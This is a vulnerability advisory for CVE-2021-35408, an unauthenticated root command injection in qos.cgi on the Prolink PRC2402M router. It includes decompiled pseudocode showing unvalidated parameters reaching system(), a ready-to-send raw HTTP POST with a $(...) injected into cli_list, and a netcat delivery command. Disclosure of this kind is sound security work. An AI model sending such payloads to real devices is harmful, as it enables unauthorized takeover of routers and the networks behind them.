CVE: CVE-2021-35408
Tested Versions:
Product URL(s):
This vulnerability is present as there are no checks on user input taken by qos.cgi
, which is passed to system
, allowing an attacker to execute arbitrary code in the context of the root user on affected installations of the Prolink PRC2402M router.
No authentication is required to exploit this vulnerability.
The router makes POST requests through HTML forms to interact with the cgi scripts. To access the vulnerable script, visit http://prc2402m.setup/cgi-bin/qos.cgi
In qos.cgi, the main
function checks if the page
parameter is equal to qos_sta
. If so, it calls the vulnerable function qos_sta_settings
.
page = web_get("page", body, 0);
if (strcmp(page,"qos") == 0) {
qos_settings(body,0x400000);
}
else if (strcmp(page, "qos_sta") == 0) {
qos_sta_settings(body);
}
As seen in the simplified pseudocode of qos_sta_settings
below, the user’s parameters cli_list
and cli_num
are passed to system
without any input validation, allowing an attacker to supply malicious input and gain arbitrary code execution.
void qos_sta_settings(undefined4 body)
{
char *cli_list;
char *cli_num;
char command [2048];
cli_list = web_get("cli_list", body, 0);
cli_list = strdup(cli_list);
cli_num = cli_num("cli_num", body, 0);
cli_num = strdup(cli_num);
...
memset(command,0,0x800);
sprintf(command, "/sbin/sta_qos.sh setup %s %s", cli_list, cli_num);
...
system(command);
...
}
The following payload contains the raw HTTP request that can be used to exploit this vulnerability.
POST /cgi-bin/qos.cgi HTTP/1.0
Host: localhost
User-Agent: HTTPie/2.4.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 69
page=qos_sta&cli_list=$(echo gg>/tmp/gg2)&cli_num=0&time_control_num=0
Save it in a file and run cat payload | nc 192.168.0.1 80
.
Note! Make sure CRLF endings is used in the request payload, otherwise lighttpd which runs on the server will ignore this request.